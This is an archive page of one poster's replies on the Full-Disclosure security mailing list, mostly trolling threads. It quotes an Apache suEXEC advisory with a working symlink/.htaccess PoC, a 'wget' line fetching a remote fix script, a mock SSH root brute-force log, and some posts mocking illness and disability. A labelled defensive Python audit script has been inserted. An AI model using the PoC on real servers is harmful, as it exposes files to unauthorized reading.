Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC

2014-03-17 Thread Gichuki John Chuksjonia
Ooh goodie, where and what happened to N3td3v, he used to crack me up :D :D

On 3/17/14, Mario Vilas  wrote:
> ROFL
>
>
> On Mon, Mar 17, 2014 at 11:07 AM, T Imbrahim
> wrote:
>
>> What drugs are you on Pedro Ribeiro I wonder ...?
>>
>> I express my views, if you don't like don't watch them. Your responses so
>> far have only been assy speculations so don't tell me I'm wrong, and please
>> don't say things like that. I don't know who the other people are, but what
>> is true in security I support. Why you would Google my name ... ?
>>
>>  Is the English language causing you ill effects?
>>
>> --- ped...@gmail.com wrote:
>>
>> From: Pedro Ribeiro 
>> To: timbra...@techemail.com
>> Cc: full-disclosure@lists.grok.org.uk, Michal Zalewski <
>> lcam...@coredump.cx>, mvi...@gmail.com, gynv...@coldwind.pl
>>
>> Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
>> Date: Mon, 17 Mar 2014 09:24:08 +
>>
>>
>> On 16 Mar 2014 23:36, "T Imbrahim"  wrote:
>> >
>> > The thread read Google vulnerabilities with PoC. From my understanding
>> > it was a RFI vulnerability on YouTube, and I voiced my support that this
>> > is a vulnerability.
>> >
>> > I also explained a JSON Hijacking case as a follow up, and you said you
>> > didn't follow.  So I am just saying that treating security that way, there
>> > are other parties like NSA who welcome them happily.
>> >
>>
>> I think these guys - Alfred, Kirschbaum and Imbrahim are the OP's sock
>> puppets.
>>
>> They are all first time posters from unusual free email providers jumping
>> to defend the OP out of nowhere. If you search Google for their emails you
>> only find references to this thread.
>>
>> They present similar (false and/or incorrect) arguments, talk about their
>> extensive work experience, bash Google and its security team and send
>> repeated emails with exactly the same text.
>>
>> This is turning into a madhouse... I hope this guy doesn't have access to
>> a gun.
>>
>> Regards
>> Pedro
>>
>>
>
>
>
> --
> "There's a reason we separate military and the police: one fights the enemy
> of the state, the other serves and protects the people. When the military
> becomes both, then the enemies of the state tend to become the people."
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Google vulnerabilities with PoC

2014-03-15 Thread Gichuki John Chuksjonia
How the hell did you ever think Google will honor this? By now they
could be fixing this issue, they hell don't care about you.



On 3/15/14, Georgi Guninski  wrote:
> Is it possible with the help of Godwin's law
> this discussion moves offlist?
>
> --
> guninski
>
> On Thu, Mar 13, 2014 at 10:43:50AM +, Nicholas Lemonias. wrote:
>> Google vulnerabilities uncovered...
>>
>>
>> http://news.softpedia.com/news/Expert-Finds-File-Upload-Vulnerability-in-YouTube-Google-Denies-It-s-a-Security-Issue-431489.shtml
>
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure

2013-08-10 Thread Gichuki John Chuksjonia
One thing u gotta remember most of the Admins who handle webservers in
a network are also developers since most of the organizations will
always need to cut on expenses, and as we know, most of the developers
will just look into finishing work and making it work. So if something
doesn't run due to httpd.conf, you will find these guys loosening
server security, therefore opening holes to the infrastructure.

Just my two cents


./Chucks

On 8/10/13, Kingcope  wrote:
> Uhh Hit em with a little Ghetto Gospel
>
> So am i less holy Because i Puff a blunt and Drink a Beer with my homies?
>
> Theres no Need for you to fear me if you Take your Time and Hear me Maybe
> you can learn to cheer me.
> It aint about Black and white cause we Human !!!
> Lord can you Hear me speaaak!!
> http://rapgenius.com/2pac-ghetto-gospel-lyrics
>
> On 09.08.2013 at 16:33, Kingcope wrote:
>
>> So the blackhat that Sits on ur Site and the site of ur company Since half
>> a year  will stop at the point Where its "technically incorrect" and wont
>> escalate to root because "it doesnt have to do Anything with suexec". Its
>> an Old vuln so let it stay , better for us and soon our Data on your
>> boxes.
>>
>> Time to Write a Real Root exploit and dont waste the Time with sysadmins
>> that know how to set a flag in httpd.conf   , apache devs included.
>>
>> On 09.08.2013 at 14:29, Kingcope wrote:
>>
>>> So what your Emails Tell me is better ignore this vulnerability. I dont
>>> Claim its a High severity Bug but if you Tell People to ignore it Because
>>> it isnt a vulnerability you are very much aiding the Chaos of insecurity
>>> in the Internet today. You Maybe have a Secure Setting but theres only
>>> you on the Planet. Attackers Look specifically for such Bugs to Open
>>> Servers. No Wonder we have compromises in a High Scale every Day due to
>>> this ignorance. My rant on that One.
>>>
>>> On 07.08.2013 at 21:49, king cope wrote:
>>>
>>>> Apache suEXEC privilege elevation / information disclosure
>>>>
>>>> Discovered by Kingcope/Aug 2013
>>>>
>>>> The suEXEC feature provides Apache users the ability to run CGI and SSI
>>>> programs under user IDs different from the user ID of the calling web
>>>> server. Normally, when a CGI or SSI program executes, it runs as the same
>>>> user who is running the web server.
>>>> Used properly, this feature can reduce considerably the security risks
>>>> involved with allowing users to develop and run private CGI or SSI programs.
>>>>
>>>> With this bug an attacker who is able to run php or cgi code inside a web
>>>> hosting environment and the environment is configured to use suEXEC as a
>>>> protection mechanism, he/she is able to read any file and directory on the
>>>> filesystem of the UNIX/Linux system with the user and group id of the
>>>> apache web server.
>>>>
>>>> Normally php and cgi scripts are not allowed to read files with the apache
>>>> user-id inside a suEXEC configured environment.
>>>>
>>>> Take for example this apache owned file and the php script that follows.
>>>>
>>>> $ ls -la /etc/testapache
>>>> -rw------- 1 www-data www-data 36 Aug  7 16:28 /etc/testapache
>>>> only user www-data should be able to read this file.
>>>>
>>>> $ cat test.php
>>>> <?php
>>>>  system("id; cat /etc/testapache");
>>>> ?>
>>>>
>>>> When calling the php file using a webbrowser it will show...
>>>> uid=1002(example) gid=1002(example) groups=1002(example)
>>>>
>>>> because the php script is run through suEXEC.
>>>> The script will not output the file requested because of a permissions
>>>> error.
>>>>
>>>> Now if we create a .htaccess file with the content...
>>>> Options Indexes FollowSymLinks
>>>>
>>>> and a php script with the content...
>>>>
>>>> <?php
>>>>  system("ln -sf / test99.php");
>>>>  symlink("/", "test99.php"); // try builtin function in case when
>>>>  //system() is blocked
>>>> ?>
>>>> in the same folder
>>>>
>>>> ..we can access the root filesystem with the apache uid,gid by
>>>> requesting test99.php.
>>>> The above php script will simply create a symbolic link to '/'.
>>>>
>>>> A request to test99.php/etc/testapache done with a web browser shows..
>>>> voila! read with the apache uid/gid
>>>>
>>>> The reason we can now read out any files and traverse directories owned by
>>>> the apache user is because apache httpd displays symlinks and directory
>>>> listings without querying suEXEC.
>>>> It is not possible to write to files in this case.
>>>>
>>>> Version notes. Assumed is that all Apache versions are affected by this
>>>> bug.
>>>>
>>>> apache2 -V
>>>> Server version: Apache/2.2.22 (Debian)
>>>> Server built:   Mar  4 2013 21:32:32
>>>> Server's Module Magic Number: 20051115:30
>>>> Server loaded:  APR 1.4.6, APR-Util 1.4.1
>>>> Compiled using: APR 1.4.6, APR-Util 1.4.1
>>>> Architecture:   32-bit
>>>> Server MPM: Worker
>>>> threaded: yes (fixed thread count)
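
Added example (not part of the original posts and not Apache project code): a defender-side audit, in Python, for the condition the advisory above depends on, namely a user-writable docroot where .htaccess turns on FollowSymLinks or Indexes and a symlink resolves outside the docroot. The function names and the sample tree are constructed for illustration; only test99.php and the Options line come from the advisory.

```python
import os
import re
import tempfile

# Options that make httpd itself (running as the Apache user, outside suEXEC)
# follow a user-planted symlink or list a directory. "All" implies both.
RISKY = {"followsymlinks", "indexes", "all"}
OPTIONS_RE = re.compile(r"^\s*Options\s+(.+)$", re.IGNORECASE)


def risky_htaccess_options(path):
    """Return the set of risky option names an .htaccess file enables."""
    found = set()
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            if line.lstrip().startswith("#"):
                continue
            match = OPTIONS_RE.match(line)
            if not match:
                continue
            for token in match.group(1).split():
                if token.startswith("-"):      # "-Indexes" disables the option
                    continue
                name = token.lstrip("+").lower()
                if name in RISKY:
                    found.add(name)
    return found


def audit_docroot(docroot):
    """Walk a docroot without following links and report risky items."""
    root = os.path.realpath(docroot)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if os.path.islink(full):
                target = os.path.realpath(full)
                escapes = os.path.commonpath([root, target]) != root
                try:
                    # Same comparison SymLinksIfOwnerMatch makes: link owner
                    # versus owner of whatever the link points at.
                    differs = os.lstat(full).st_uid != os.stat(full).st_uid
                except OSError:                # dangling link
                    differs = False
                if escapes or differs:
                    findings.append({"kind": "symlink", "path": rel,
                                     "target": target,
                                     "escapes_docroot": escapes,
                                     "owner_differs": differs})
            elif name == ".htaccess":
                options = risky_htaccess_options(full)
                if options:
                    findings.append({"kind": "htaccess", "path": rel,
                                     "options": sorted(options)})
    return sorted(findings, key=lambda f: (f["kind"], f["path"]))


def build_sample_tree():
    """Constructed sample docroot: one risky setup, one benign setup."""
    site = os.path.join(tempfile.mkdtemp(prefix="suexec-audit-"), "site")
    os.makedirs(os.path.join(site, "releases", "v1"))
    os.makedirs(os.path.join(site, "sub"))
    with open(os.path.join(site, ".htaccess"), "w") as fh:
        fh.write("Options Indexes FollowSymLinks\n")           # from the advisory
    with open(os.path.join(site, "sub", ".htaccess"), "w") as fh:
        fh.write("# hardened\nOptions -Indexes +SymLinksIfOwnerMatch\n")
    os.symlink("/", os.path.join(site, "test99.php"))          # from the advisory
    os.symlink(os.path.join("releases", "v1"), os.path.join(site, "current"))
    return site


if __name__ == "__main__":
    for finding in audit_docroot(build_sample_tree()):
        print(finding)
```

On the server side, the matching hardening is an `AllowOverride` setting that does not let users change `Options`, with `Options -FollowSymLinks +SymLinksIfOwnerMatch` on user directories. The Apache documentation notes that the owner-match test is subject to race conditions, so a periodic scan like this one remains useful.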

Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown

2013-06-08 Thread Gichuki John Chuksjonia
What happened to the link.

On 6/8/13, kai  wrote:
>> wget http://botslayer.ru/final_solution.txt
>
> i've registered this domain just to save incompetent shitheads who blindly
>
> run any code which is supposed to "fix security problem". why have you
> included the non-existent domain in your code?
>
> thanks for your interesting investigation anyway.
>
>
> Cheers,
>
> Kai
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] LulzSec EXPOSED!

2011-06-06 Thread Gichuki John Chuksjonia
I think its just a bruteforce.




On 6/6/11, Andreas Bogk  wrote:
> Excerpts from lulzfail's message of Mo Jun 06 08:39:42 +0200 2011:
>> Lulzsec == pwnt
>
> I've seen the log you pasted to pastebin.  Is this:
>
>  * A timing attack on ssh passwords over the net?
>  * Fake, to distract us from your real 0day?
>
> Andreas
>
> Log:
>
> root@gibson:~# ./1337hax0r 204.188.219.88 -root
> Attempting too hax0r root password on 204.188.219.88
>
> h,VhXz 3xL ffsakTgyc~H
> ZZrz,pJrg b{4Bv_Y$$Z6
> XDh;vDU-;3>
> FB-hvg%g_'t
> }qHNvkS"'>g
> RNBKvUi5yO|
> z`(}v<1^>u&
> *V4?vh9#^f2
> /R*9vf 9P65vjKhh.N
> \rfsv~PhNDz
>>Bfpv|uhGpy
> J%"kvf]hGf0
> sY0"v{2hf7p
>>9dev%Qh6_v
> * }:lkvV^hN2U
> ;&5Xv'Sh#}_
> MOqpvi_hg+#
> Md9/viVh&u7
> M(%rvomhb'"
> MI"5v_shEVe
> M=@?vl.hZge
> MPk5v:WhUTe
> M=3vvrzh7Te
> M&'?v]sh`Te
> M/Z,vI1h`Te
> M.9>vO$hTTe
> Ms!(vY;hpTe
> MA)SvYLhnTe
> M7eCv@Lh0Te
> MkeCvFLh$Te
> M'eCv?LhaTe
> M&eCvLLh|Te
> M*eCv5Lh\Te
> MmeCvcLhCTe
> MTeCv&LhrTe
> M,eCv1LhYTe
> MEeCv}LhHTe
> M_eCvSLhnTe
> MPeCvSLh+Te
> M[eCvSLh,Te
> MOeCvSLh"Te
> M7eCvSLh"Te
> MGeCvSLhdTe
> M$eCvSLhkTe
> MCeCvSLhkTe
> MLeCvSLhkTe
> M=eCvSLhkTe
> M-eCvSLhkTe
> MweCvSLhkTe
> M=eCvSLhkTe
> M3eCvSLhkTe
> M6eCvSLhkTe
> MreCvSLhkTe
> M6eCvSLhkTe
> MFeCvSLhkTe
> MSeCvSLhkTe
> M8eCvSLhkTe
>
> Password hax0rd! root password: M8eCvSLhkTe
>
> root@gibson:~# ssh 204.188.219.88
>
> root@204.188.219.88's password:
>
> root@xyz:~# hostname; id; w
> xyz
> uid=0(root) gid=0(root) groups=0(root)
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] 10 OpenBSD facts and is timeline of Backdoor

2010-12-16 Thread Gichuki John Chuksjonia
God, i cant even understand half the shit he is saying? English so upside down!





On 12/17/10, Christian Sciberras  wrote:
> HAHAHAHAHAH!!
>
> GOD so are funny you!11
>
>
>
>
> 2010/12/16 musnt live 
>
>> OpenBSD is Backdoor facts
>>
>> 1) Is we look to monkey.org posting, we is see Theo make is change to
>> CVS for this portion of code is work on by Jason (name is mentioned by
>> Perry)
>>
>> 2) Is we look at timeframe for Backdoor, is code be in 2.5 or 2.6,
>> musn't live theorize 2.6
>>
>> * 2.6: December 1, 1999 -
>> * Based on the original SSH suite and developed further by the OpenBSD
>> team, 2.6 saw the first release of OpenSSH, which is now available
>> standard on most Unix-like operating systems and is the most widely
>> used SSH suite.
>>
>> http://en.wikipedia.org/wiki/Timeline_of_OpenBSD
>>
>> 3) Is Theo not deny there is no backdoor, only say he is unaware
>> (musn't live is unaware of exact time right now, is know time exist!)
>>   a) Theo and OpenBSD not audit anything (trusting trust)
>>   b) pre-emptive "is wasn't me" from Theo in event truth comes later
>> "Hey I is Theo I do right thing and strike err.. Disclose first! I not
>> know!"
>>   c) all of is the above
>>
>> 4) While is everyone claim Perry прил, is no one else outside of Jason
>> on OpenBSD is say: "Perry is lying" even former developers is stay
>> quiet to protect the DARPA/FBI innocent
>>
>> 5) Is possible at people by mentioned in named by Perry, go to Canada
>> to "hack code" and plant is backdoor
>>
>> 6) Old code (2.6) is sayanoruski. Is good luck find mirror. CVS is
>> controlled by those is accused, quick move and we is have: "See is no
>> backdoor in this backdoor!"
>>
>> 7) OpenBSD is the most secure backdoored on the planet
>>
>> 8) Is need slogan change: "Only two remote holes in the default
>> install, in a heck of a long time! (Is besides backdoor!!!)"
>>
>> 9) We is all peons to Theo and we is cannot figure out truth as we is
>> brains are so too small
>>
>> 10) Claims surpass is Microsoft NSA theory
>>
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/


Re: [Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence

2010-03-21 Thread Gichuki John Chuksjonia
waoh. very funny.

On 3/21/10, Andrew Walberg  wrote:
> Hello.
>
> Everyone here has learned there lesson and has suffered because Andrew
> Wallace ("n3td3v") has been banned.
>
> n3td3v is a multi-national organization of national security experts who
> have been driven to the underground thanks to John Cartwright. Since then,
> mossad has been able to infiltrate and cause significant global problems.
>
> n3td3v was offended and furious. He doesn't have 0day. He doesn't hack.
>
> Unban Andrew Wallace and let the information be free.
>
> If you unban him we will finally have justice in this world for n3td3v and
> his 5000 employees. Everyone at our office is waiting for your answer, John
> Cartwright
>
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

2010-01-04 Thread Gichuki John Chuksjonia
Especially the ones working for governments, the surveillance and
espionage etc, scares more

On 1/4/10, netinfinity  wrote:
> I couldn't agree more with Adriel.
>
> --
> netinfinity
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

2010-01-02 Thread Gichuki John Chuksjonia
One of the amazing things about these hackers calling themselves antisec
is that they didn't have real hardening on their servers. Most of their
servers had direct public ip on their Interfaces and even their user
management was crappy.

I remember when  i heard of antisec i thot these guys were real gurus
with more than 10 years of experience, but after the fake sshd and
fake attacks, and DDOS that meant nothing and now all is lulz, i cant
help but rofl.


./Chuks

On 1/2/10, Jeff Blaum  wrote:
> It still does not change the fact that you (Glafkos) are a cock, and that
> astalavista is (and was) always a shit stain of a website.
>
> J
>
> On Thu, Dec 31, 2009 at 9:38 AM, Glafkos Charalambous
> wrote:
>
>> [ASCII-art banners: "LULZ!", anti-sec.com, "RAWR!"]
>>
>> http://www.anti-sec.com
>> http://pastebin.com/f12f6f9c0
>> http://pastebin.mozilla.org/694145
>> http://pastebin.ca/1733192
>>
>>
>>
>>
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] The Cyber War Conspiracy

2009-12-05 Thread Gichuki John Chuksjonia
K, full-disclos...@safe-mail.net or whoever you are, i think you are
watching too much of 24 or even Spooks. Please quit and relax abit!!!




./Chuks



On 12/5/09, Paul Schmehl  wrote:
> --On December 4, 2009 10:44:20 PM -0600 valdis.kletni...@vt.edu wrote:
>
>>
>> On Fri, 04 Dec 2009 14:32:34 PST, Sam Haldorf said:
>>
>>> n3td3v is probably ureleet, full-censorship, full-disclosure, antisec,
>>> jdl and valdis.
>>
>> He might be those other dudes, but he's not me.  If I was going to pose
>> as
>> a troll, I'd pose as a more clueful troll - trying to think that
>> cluelessly
>> makes my brain hurt.
>>
>> On the other hand, nobody's ever seen me and Paul Schmehl at the same
>> place
>> at the same time... I wonder why... :)
>
> Because we have no travel money.  :-)
>
> Paul Schmehl, If it isn't already
> obvious, my opinions are my own
> and not those of my employer.
> **
> WARNING: Check the headers before replying
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] n3td3v mentioned in a book?

2009-10-04 Thread Gichuki John Chuksjonia
Maybe its not a Ban, maybe its a burn notice!

On 10/4/09, full-censors...@hushmail.com  wrote:
> if this guy is mentioned in a book and we banned him?
>
> http://f0rb1dd3n.com/links.php
>
> i'm calling for a serious review of whats going on with the ban
> list.
>
>
>
>
>
>
>
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers

2009-09-29 Thread Gichuki John Chuksjonia
Thank you for this my.hndl. There are some issues i have been having
and seems your methodology may work on Fedora and other OSs.

Thankx

./Chuks

On 9/30/09, maxigas  wrote:
> From: "bo...@civ.zcu.cz" 
> Subject: Re: [Full-disclosure] Modifying SSH to Capture Login Credentials
> from Attackers
> Date: Wed, 30 Sep 2009 00:03:51 +0200
>
>>> All standard users have read access to /var/log/auth, so if root
>>
>> they shouldn't, at least on my default debian they don't ...
>
> On my default Ubuntu, users in "adm" group have read access to the
> authentication log file:
>
> m...@machine: ls -l /var/log/auth.log
> -rw-r----- 1 syslog adm 46774 2009-09-30 01:10 /var/log/auth.log
>
> --
> ×× maxigas
> // villanypásztor / kiberpunk / web shepherd //
>
> -= Important communication disclaimer: by replying to my emails you are
> disclaiming all your disclaimers. =-
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] n3td3v's Twitter account hacked

2009-09-19 Thread Gichuki John Chuksjonia
Just saw that. Thot were new trolls by n3td3v pouring all the way to twitter.


On 9/19/09, The Security Community  wrote:
> Someone evidently hacked into n3td3v's Twitter account and is spewing
> nonsense.
>
> http://twitter.com/n3td3v
>
> Maybe it's some sort of botnet C&C account now, I dunno.
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Moar iProphet questions

2009-08-29 Thread Gichuki John Chuksjonia
Now, i think this is really wrong. There is no need of making fun of
someone who is disabled by attacking n3td3v.


On 8/29/09, Gary McKinnon  wrote:
> iProphet (weev) Questions
>
> Sorry for being repetitive. FD is mostly hoarsechit and fucin
> around anyway (not that you do ANY of that).
>
> My name is Gary McKinnon, I'm the "nerd" that hacked into the
> Pentagon. I'm autistic so I may have difficulty communicating or
> understanding you.
>
> HELLO? Can you hear me?
>
> I CAN'T SEE THE SCREEN. LET ME TRY TO TYPE SOME QUEStions
>
> 8==^H^H^H^H^HD
>
> 1.) Do you have HIV?
> 2.) Have you ever anointed anyone with your IRL "Virus"?
> 3.) Do you think that you could be prosecuted for hacking if you
> give people your IRL badware?
> 4.) Do the woman you give HIV to go to heaven?
> 5.) What does your computer screen look like? You run linux? Do you
> have an iProphet wallpaper?
> 6.) When will we be seeing new vlogcasts
> 7.) Do you plan on writing some subversive PDF's for us?
> 8.) Do you intend on making a documentary so it can go viral and
> cause a revolution?
> 9.) In your mind, what is your picture of an ideal world?
>
> This post was by Gary McKinnon [SOLO], elite autistic hacker.
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] http://secreview.blogspot.com -- end of life

2009-08-14 Thread Gichuki John Chuksjonia
Please bring it back. It was a nice blog, or send me an archive of the ut.

Thankx

./Chuks



On 8/13/09, secrev...@hushmail.me  wrote:
> Hi Everyone,
>
> We received a lot of emails from different people asking us what
> happened to our blog at http://secreview.blogspot.com. What
> happened is we decided to shut down operations because we don't
> have time to keep doing reviews. We also don't have time to redo
> reviews which is needed to keep the reviews fair. We all have full
> time jobs and recently have been traveling a lot.
>
> We started secreview because we wanted to expose security companies
> for what they really were. But now because we can't do it any more
> we don't think its fair that only some companies get reviewed and
> others don't. So we deleted the blog (but we have 90 days to bring
> it back if people want it).
>
> If we do bring it back, we will probably not do any more reviews
> and we will leave it up just because. Do people want the blog to be
> recovered or do they want us to keep it dead?
>
> -- Secreview
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Redspin, Inc. (C+)

2009-08-13 Thread Gichuki John Chuksjonia
Just read this.

What happened to your blog, http://secreview.blogspot.com?



On 8/11/09, secreview  wrote:
> We received 22 requests from different people to perform a review of
> Redspin! Their website can be found at http://www.redspin.com. We
> haven’t done a review of anyone in quite a while, the last review that
> we did was for Pivot Point Security who got an A (we still recommend
> them). We apologize for this long delay but we have been very busy
> traveling (yes we still have jobs doing consulting work sometimes).
>
> As you can see from the comments that we received in other posts we
> have a lot of catch up work to do, but to be honest we are not sure
> that we will be able to do it. This review might be our final and last
> review depending on how much more travel we have. (We have lives, some
> of us have families, and we can’t keep doing this for free even though
> we feel that this is a great service).
>
> We did a lot of research on Redspin and we managed to get a copy of two
> reports that they did for two different customers. We won’t share those
> reports with you because that would be unethical, don’t ask.
>
> Redspin claims that it is a “pure penetration testing firm”. What they
> mean by “pure penetration testing” is that they do not resell third
> party software or hardware. They also say that “don't find problems on
> your network so that [they] can make more money; [their] penetration
> testing services reveal vulnerabilities, [that] will help you become
> more secure.”
>
> We verified their claim with our own research. Redspin will not try to
> sell you software or hardware… but they might try to sell you software
> as a service. (see their www.jetmetric.com website).
>
> Redspin takes it a step further and is brutally honest about their
> methodology for delivering penetration-testing services. They openly
> admit that their services rely on automated vulnerability scanners
> (Nessus) and are enhanced by manual testing. In fact, Redspin says that
> automated scanners “can miss about 40% of the security risk so they
> alone do not adequately assess risk. Furthermore, about half of the
> findings from a vulnerability scan are false positives”.
>
> Any security company that relies on automated scanners can weed out
> false positives, but doing that doesn’t really increase the depth and
> accuracy of testing. A false positive, also known as an error of the
> first kind, or a Type I Error, is the rejection of a null hypothesis
> when it is in fact true. In more simple terms, this is the error of
> observing a difference when in fact there isn’t one. Identifying false
> positives is fairly easily done, as it only requires inspecting the
> results produced by a scanner.
>
> But what about False Negatives? A False Negative, also called a Type II
> Error, or an error of the second kind, is the error of failing to
> reject a null hypothesis when it is in fact not true. More simply, a
> False Negative is the error of failing to observe a difference when in
> truth there is one. So, if an automated vulnerability scanner tests a
> vulnerable service (a known vulnerability) but the scanner doesn’t
> detect the vulnerability then the vulnerability is excluded from the
> report. If this is the case then Redspin’s methodology will break down
> because there will be no result in the report for Redspin to manually
> test. That vulnerability will fly under the Redspin radar but might not
> be missed by a hacker. So how many vulnerabilities does Redspin miss?
> It’s a question worth asking.
>
> Redspin does say that “vulnerability scanning is not suitable on its
> own as a complete or billable service offering, it does provides some
> value in the early reconnaissance phase of a more comprehensive
> External Network Security Assessment”. They have a typo in that
> sentence, but other than that, they are right. Vulnerability scanning
> does have a position in the industry and is a huge time saver,
> especially when testing large numbers of systems. Just don’t rely on
> one vulnerability scanner like Redspin does, use two or more like the
> OSSTMM proposes.
>
> Redspin says “manual analysis is at the heart of all of [their]
> assessments which not only gives you confidence that you have a
> complete view of your security risk, but provides tailored reporting
> and recommendations enabling simple work-arounds and cost-effective
> mitigation strategies for most security issues.” Based on our research
> Redspin’s “manual analysis” isn’t what we expected it to be. It is not
> based on vulnerability research and is strictly based on the inspection
> and verification of scanner output.
>
> What we can say is that their “manual analysis” doesn’t produce the
> highest quality reports that we’ve ever seen, but it does produce
> reports that are higher than average quality. The Redspin reports have
> very few, if any, False Positives but will contain more False Negatives
> than a report that is centered on sol

Re: [Full-disclosure] AntiSec PHHEER #1 (anti...@hushmail.com)

2009-08-09 Thread Gichuki John Chuksjonia
i thought the same thing. This guy shud get a life!!!

On 8/9/09, Zloss  wrote:
> So what the heck are you doing dumbass ?
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] anti-sec: OpenSSH <= 5.2 zero day exploit code - 48 hours until it is publicly released!

2009-07-19 Thread Gichuki John Chuksjonia
hahaha, now u r releasing it

I thought u guyz dont release or disclose vulnerabilities.

./Chuks

On 7/20/09, Ant-Sec Movement  wrote:
> Dear Reader,
> In 48 hours, the anti-sec movement will publicly unveil working exploit code
> and full details for the zero-day OpenSSH vulnerability we discovered. It
> will be posted to the Full-Disclosure security list.
>
> Soon, the very foundations of Information Technology and Information
> Security will be unearthed as millions upon millions of systems running ANY
> version of OpenSSH are compromised by wave after wave of script-kiddie and
> malicious hacker.
>
> Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
> anti-sec will be unleashing powerful computer worm source code with the
> ability to automatically find and compromise systems running any and all
> versions of OpenSSH.
>
> This is an attack against all White Hat Hackers who think that running a
> Penetration Test simply searching for known vulnerabilities is all they have
> to do in order to receive their payment. Anti-sec will savor the moment when
> White Hat Hackers are made to look like fools in the eyes of their clients.
>
> Sincerely,
>
> -anti-sec
>


-- 
-- 
Gichuki John Ndirangu,
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread Gichuki John Chuksjonia
Hehehe, netdev? For real? He is the Anti-sec. I think that's wrong

On Thu, Jul 16, 2009 at 1:35 PM, Benjamin Cance wrote:
> now we know who antisec are/is, i'm going to bed
>
> Charles Majola wrote:
>> HAH!
>>
>> I knew it
>>
